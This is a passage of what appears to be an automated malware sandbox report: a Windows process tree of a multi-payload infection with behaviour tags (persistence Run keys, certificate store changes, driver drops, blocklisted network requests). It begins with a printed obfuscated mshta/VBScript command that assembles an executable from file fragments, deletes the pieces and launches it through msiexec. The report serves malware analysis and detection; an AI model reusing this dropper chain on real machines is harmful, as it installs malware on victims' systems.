C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )8⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"10⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC10⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "hEPbeAf5cdzCvC40FkJ2kgey.exe"7⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\N2XnjEQZk3notVmmRBXAgMj_.exe"C:\Users\Admin\Pictures\Adobe Films\N2XnjEQZk3notVmmRBXAgMj_.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=15⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"6⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1c8,0x1cc,0x1d0,0x190,0x1d4,0x7ff87a8cdec0,0x7ff87a8cded0,0x7ff87a8cdee07⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff6ad3a9e70,0x7ff6ad3a9e80,0x7ff6ad3a9e908⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1772,1723310839277623217,8304522968578975292,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8852_922687054" --mojo-platform-channel-handle=1784 /prefetch:87⤵
-
C:\Users\Admin\Pictures\Adobe Films\RfrsVo1QXyIu4tRjM9YC3pg5.exe"C:\Users\Admin\Pictures\Adobe Films\RfrsVo1QXyIu4tRjM9YC3pg5.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\RfrsVo1QXyIu4tRjM9YC3pg5.exe"C:\Users\Admin\Pictures\Adobe Films\RfrsVo1QXyIu4tRjM9YC3pg5.exe" -u5⤵
-
C:\Users\Admin\Pictures\Adobe Films\no0l9mpWsCqV6aZKeWDYdC_0.exe"C:\Users\Admin\Pictures\Adobe Films\no0l9mpWsCqV6aZKeWDYdC_0.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-UQN5D.tmp\no0l9mpWsCqV6aZKeWDYdC_0.tmp"C:\Users\Admin\AppData\Local\Temp\is-UQN5D.tmp\no0l9mpWsCqV6aZKeWDYdC_0.tmp" /SL5="$A03EA,506127,422400,C:\Users\Admin\Pictures\Adobe Films\no0l9mpWsCqV6aZKeWDYdC_0.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-G2C1V.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-G2C1V.tmp\DYbALA.exe" /S /UID=27096⤵
- Drops file in Drivers directory
- Adds Run key to start application
-
C:\Program Files\Windows Sidebar\ZPOCBYJYJB\foldershare.exe"C:\Program Files\Windows Sidebar\ZPOCBYJYJB\foldershare.exe" /VERYSILENT7⤵
-
C:\Users\Admin\AppData\Local\Temp\ea-3ee94-30c-07a9a-8f085fdc782a8\Xokuxawegy.exe"C:\Users\Admin\AppData\Local\Temp\ea-3ee94-30c-07a9a-8f085fdc782a8\Xokuxawegy.exe"7⤵
- Checks computer location settings
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 13448⤵
-
C:\Users\Admin\AppData\Local\Temp\53-a38be-5cb-fc9a6-2f8b106d2b04f\Lyhaepigitae.exe"C:\Users\Admin\AppData\Local\Temp\53-a38be-5cb-fc9a6-2f8b106d2b04f\Lyhaepigitae.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n5rtzs3w.5ve\GcleanerEU.exe /eufive & exit8⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Local\Temp\n5rtzs3w.5ve\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\n5rtzs3w.5ve\GcleanerEU.exe /eufive9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3b3e0zzx.iqw\vpn.exe /silent /subid=798 & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\3b3e0zzx.iqw\vpn.exeC:\Users\Admin\AppData\Local\Temp\3b3e0zzx.iqw\vpn.exe /silent /subid=7989⤵
-
C:\Users\Admin\AppData\Local\Temp\is-77NNM.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-77NNM.tmp\vpn.tmp" /SL5="$306F2,15170975,270336,C:\Users\Admin\AppData\Local\Temp\3b3e0zzx.iqw\vpn.exe" /silent /subid=79810⤵
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "11⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090112⤵
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "11⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090112⤵
- Drops file in System32 directory
- Checks SCSI registry key(s)
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall11⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install11⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5fygr0lm.55b\installer.exe /qn CAMPAIGN="654" & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\5fygr0lm.55b\installer.exeC:\Users\Admin\AppData\Local\Temp\5fygr0lm.55b\installer.exe /qn CAMPAIGN="654"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cuhqnzvx.nsa\any.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\cuhqnzvx.nsa\any.exeC:\Users\Admin\AppData\Local\Temp\cuhqnzvx.nsa\any.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\cuhqnzvx.nsa\any.exe"C:\Users\Admin\AppData\Local\Temp\cuhqnzvx.nsa\any.exe" -u10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o55fjdwk.0af\gcleaner.exe /mixfive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\o55fjdwk.0af\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\o55fjdwk.0af\gcleaner.exe /mixfive9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\otef0chr.cem\autosubplayer.exe /S & exit8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jyndm1kb.3qc\GcleanerEU.exe /eufive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\jyndm1kb.3qc\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\jyndm1kb.3qc\GcleanerEU.exe /eufive9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 65210⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 67210⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 70810⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 80810⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 88410⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 95610⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 110410⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0d45ufgb.sty\installer.exe /qn CAMPAIGN="654" & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\0d45ufgb.sty\installer.exeC:\Users\Admin\AppData\Local\Temp\0d45ufgb.sty\installer.exe /qn CAMPAIGN="654"9⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\0d45ufgb.sty\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\0d45ufgb.sty\ EXE_CMD_LINE="/forcecleanup /wintime 1635580346 /qn CAMPAIGN=""654"" " CAMPAIGN="654"10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c2k12bqz.gcc\any.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\c2k12bqz.gcc\any.exeC:\Users\Admin\AppData\Local\Temp\c2k12bqz.gcc\any.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\c2k12bqz.gcc\any.exe"C:\Users\Admin\AppData\Local\Temp\c2k12bqz.gcc\any.exe" -u10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bn5xfybe.3ty\gcleaner.exe /mixfive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\bn5xfybe.3ty\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\bn5xfybe.3ty\gcleaner.exe /mixfive9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\amfvbcho.yex\autosubplayer.exe /S & exit8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon17bbf11fdb575d.exeMon17bbf11fdb575d.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon17bffc2992eb3d.exeMon17bffc2992eb3d.exe /mixone1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 6602⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 6762⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 6802⤵
- Executes dropped EXE
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 6362⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 8842⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 9322⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 11522⤵
- Program crash
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 40BB4D39B46753C7285A90030BFEC791 C2⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 21939D635F63F3846A66B01A8D320DC9 C2⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 45040A370CC015B5E359C31147D60EE42⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe" -silent=1 -CID=778 -SID=778 -submn=default3⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" "--ZgwMku75"4⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exeC:\Users\Admin\AppData\Roaming\Settings\Settings.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Settings\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Settings\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Settings\User Data" --annotation=plat=Win64 --annotation=prod=Settings --annotation=ver=0.0.13 --initial-client-data=0x20c,0x210,0x214,0x1e8,0x218,0x7ff89517dec0,0x7ff89517ded0,0x7ff89517dee05⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1892,8511661581425862090,678632248883483030,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1004_33545659" --mojo-platform-channel-handle=1964 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1892,8511661581425862090,678632248883483030,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1004_33545659" --mojo-platform-channel-handle=1960 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1892,8511661581425862090,678632248883483030,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1004_33545659" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1912 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1892,8511661581425862090,678632248883483030,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1004_33545659" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2692 /prefetch:15⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1892,8511661581425862090,678632248883483030,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1004_33545659" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2640 /prefetch:15⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1892,8511661581425862090,678632248883483030,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1004_33545659" --mojo-platform-channel-handle=3196 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1892,8511661581425862090,678632248883483030,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1004_33545659" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3248 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1892,8511661581425862090,678632248883483030,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1004_33545659" --mojo-platform-channel-handle=484 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1892,8511661581425862090,678632248883483030,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1004_33545659" --mojo-platform-channel-handle=3616 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1892,8511661581425862090,678632248883483030,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1004_33545659" --mojo-platform-channel-handle=3724 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1892,8511661581425862090,678632248883483030,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1004_33545659" --mojo-platform-channel-handle=2036 /prefetch:85⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_293C.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites' -retry_count 10"3⤵
- Blocklisted process makes network request
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A9A53F72AE071983088856D928F7D1412⤵
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3C45EBA87E14F1144A55F7544201B869 E Global\MSI00002⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
- Checks SCSI registry key(s)
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{58b9b76d-a58e-2c42-802e-074870877804}\oemvista.inf" "9" "4d14a44ff" "0000000000000170" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000180"2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Checks SCSI registry key(s)
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess1⤵
- Modifies system executable filetype association
- Adds Run key to start application
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\FileSyncConfig.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\FileSyncConfig.exe"2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
